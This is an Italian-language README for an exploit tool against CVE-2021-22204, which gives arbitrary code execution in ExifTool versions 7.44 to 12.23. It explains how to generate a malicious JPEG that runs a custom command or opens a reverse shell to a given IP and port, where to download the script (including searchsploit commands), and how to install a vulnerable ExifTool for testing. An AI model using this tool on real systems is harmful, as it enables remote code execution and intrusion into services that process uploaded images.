
Exploit per CVE-2021-22204 (ExifTool) - Esecuzione arbitraria di codice

Ti piace questo repo? Dacci una ⭐!
Solo per scopi educativi e di ricerca sulla sicurezza autorizzata.
@UNICORDev di (@NicPWNs e @Dev-Yeoj)
La mancata neutralizzazione dei dati utente nel formato file DjVu in ExifTool versioni 7.44 e successive consente l'esecuzione arbitraria di codice durante l'analisi dell'immagine malevola.
Usa questo exploit per generare un payload di immagine JPEG che può essere utilizzato con una versione vulnerabile di ExifTool per l'esecuzione di codice. È possibile fornire un comando personalizzato o generare una reverse shell. Un'immagine JPEG viene generata automaticamente e, opzionalmente, è possibile fornire un'immagine JPEG personalizzata in cui inserire il payload.
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Modalità comando personalizzato. Fornisce il comando da eseguire.
-s Modalità reverse shell. Fornisce IP e porta locali.
-i Percorso per un'immagine JPEG personalizzata. (Opzionale)
-h Mostra questo menu di aiuto.
Scarica exploit-CVE-2021-22204.py da GitHub
Scarica exploit-CVE-2021-22204.py da ExploitDB
searchsploit -u
searchsploit -m 50911

Exiftool Versione 12.23
Exiftool Versioni 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg